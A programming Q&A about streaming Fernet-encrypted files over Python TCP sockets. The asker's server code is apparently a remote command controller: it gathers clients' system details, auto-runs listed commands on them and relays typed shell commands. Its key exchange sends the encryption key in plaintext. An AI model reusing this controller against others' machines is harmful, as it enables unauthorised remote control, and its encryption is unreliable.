# How to send encrypted files over internet in TCP sockets python 3

Tags: python-3.x, sockets, encryption, tcp

I am trying to send an encrypted file over TCP sockets in python, I don't want to have to encrypt the message, save it in %TEMP% and then send it (it could fill up hard drive space).
I am following this code I found online at: https://gist.github.com/giefko/2fa22e01ff98e72a5be2

Here is my server code:

```
from random import choice
import socket, os, threading, json
from cryptography.fernet import Fernet

chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPWRSTUVWXYZ1234567890!@#$%^&*()"

#read the key or generate
key = b""
if os.path.exists("client.key"):
    with open("client.key", "rb") as f:
        key = f.read()
else:
    with open("client.key", "wb") as f:
        key = Fernet.generate_key()
        f.write(key)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

port = 34467
host = "0.0.0.0"

s.bind((host, port))
print(f"LISTENING ON {host}:{port}")

s.listen(100)

def new_salt():
    salt = ""
    for x in range(15):
        salt += choice(chars)
    return salt

def handle_client(conn, addr):
    encryption = False
    def send_raw(content_type, Bytes_, salt=new_salt()):
        seperator = "<|SEPERATE|>"
        to_send = content_type + seperator + Bytes_.decode() + seperator + salt
        to_send = to_send.encode()
        if encryption:
            to_send = Fernet(key).encrypt(to_send)
        conn.send(to_send)
    
    def recv_raw(BufferSize):
        seperator = "<|SEPERATE|>".encode()
        data = b""
        while True:
            data = conn.recv(BufferSize)
            if data: break
        if encryption:
            data = Fernet(key).decrypt(data)
        splitted = data.decode().split(seperator.decode())
        content_type = splitted[0]
        Bytes_ = splitted[1].encode()
        salt = splitted[2]
        return {"content_type": content_type, "bytes": Bytes_}

    print("NEW CLIENT AT IP: " + str(addr[0]))
    print("EXTANGING KEY")
    send_raw("KEY", key)
    client_key = recv_raw(1024)["bytes"]
    if key == client_key:
        print("KEY EXTANGE VERIFIED")
    else:
        print("UNABLE TO VERIFY, CLIENT MAY EXPERIENCE ISSUES")
        print(key)
        print(client_key)
    encryption = True

    print("GRAPPING SYSTEM INFO...")
    sys_info_request = recv_raw(1024)
    print("RECIVED, DECODING...")
    sys_info = json.loads(sys_info_request["bytes"].decode())
    print("BASIC INFO:")
    print("Platoform: " + sys_info["platform"])
    print("Architecture: " + str(sys_info["architecture"]))
    print("Username: " + sys_info["username"])
    
    if os.path.exists("autorun.txt"):
        with open("autorun.txt", "r") as f:
            print("FOUND AUTORUN, EXECUTING COMMANDS")
            for line in f.readlines():
                print("> " + line)
                send_raw("command", line.encode())
                output = recv_raw(1024)
                print(output["bytes"].decode())

    current_dir = sys_info["current_dir"]
    while True:
        try:
            cmd = input(current_dir + "> " + sys_info["username"] + " $ ")
            if cmd == "abort":
                send_raw("abort", "".encode())
                conn.close()
                print("SAFE")
                break
            if cmd == "send_file":
                # CODE GOES HERE

            send_raw("command", cmd.encode())
            output = recv_raw(1024)["bytes"].decode()
            print(output)
        except:
            print("UNEXCPECTED ERROR")

while True:
    conn, addr = s.accept()
    threading.Thread(target=handle_client, args=(conn,addr,)).start()
```

I haven't found anything online that will work in my senario.

Answer (score 0):

Okay, so you want to open a file, encrypt it and send it and avoid writing a tempfile to the hard disc, right? This works (taken from the example server code you linked):

```
while True:
    conn, addr = s.accept()     # Establish connection with client.
    print('Got connection from', addr)
    data = conn.recv(1024)
    print('Server received', repr(data))
    from cryptography.fernet import Fernet
    key = Fernet.generate_key()
    ff = Fernet(key)
    filename='crs.py' #In the same folder or path is this file running must the file you want to tranfser to be
    f = open(filename,'rb')
    l = f.read(1024)
    while (l):
       enc = ff.encrypt(l)
       conn.send(enc)
       print('Sent ',repr(enc))
       l = f.read(1024)
    f.close()
    print('Done sending')
    conn.send(b'Thank you for connecting')
    conn.close()
```

So, I am just opening the file, reading it 1024 bytes a time, encrypting it and then sending it along ..  Does that answer your question?

Comment: With the buffer size, wouldn't the client be missing data, and also the "thanks for connecting" will be missed, right? Also @Chev_603, my socket has a "header" (you can see the function called send_raw(), would that interfere (the buffer size by the header) ?

Comment: the client is just reciving the done message, no file content but the l varible contains bytes and content, here is the output: CLIENT: b'{DONE}' SERVER: b'gAAAAABiqpLtc7K2veQh3QbnaooYMRDUjAzg6lktWnkKtGybGlmHhnogV4OsT_-mr1Vde5afGJ5JIgaIb-_uIcyXnXlO94IXIg6V2K2VUdjPWzafGILXhVauZlONEgx40PNW6HCYm33N' (the decoded data is right'

Comment: No, the client will not missdata. It will send data in chunks that size, the last chunk will be less. The socket code handles that automatically. No, the header should not interfere with that, assuming it is working already, should not matter. And yeah, that 'thanks for connecting'  was in the example code you linked, not relevant.

Comment: You should connect with netcat to test if your client code is not working properly.

Comment: How would i do that (I don't use ncat alot)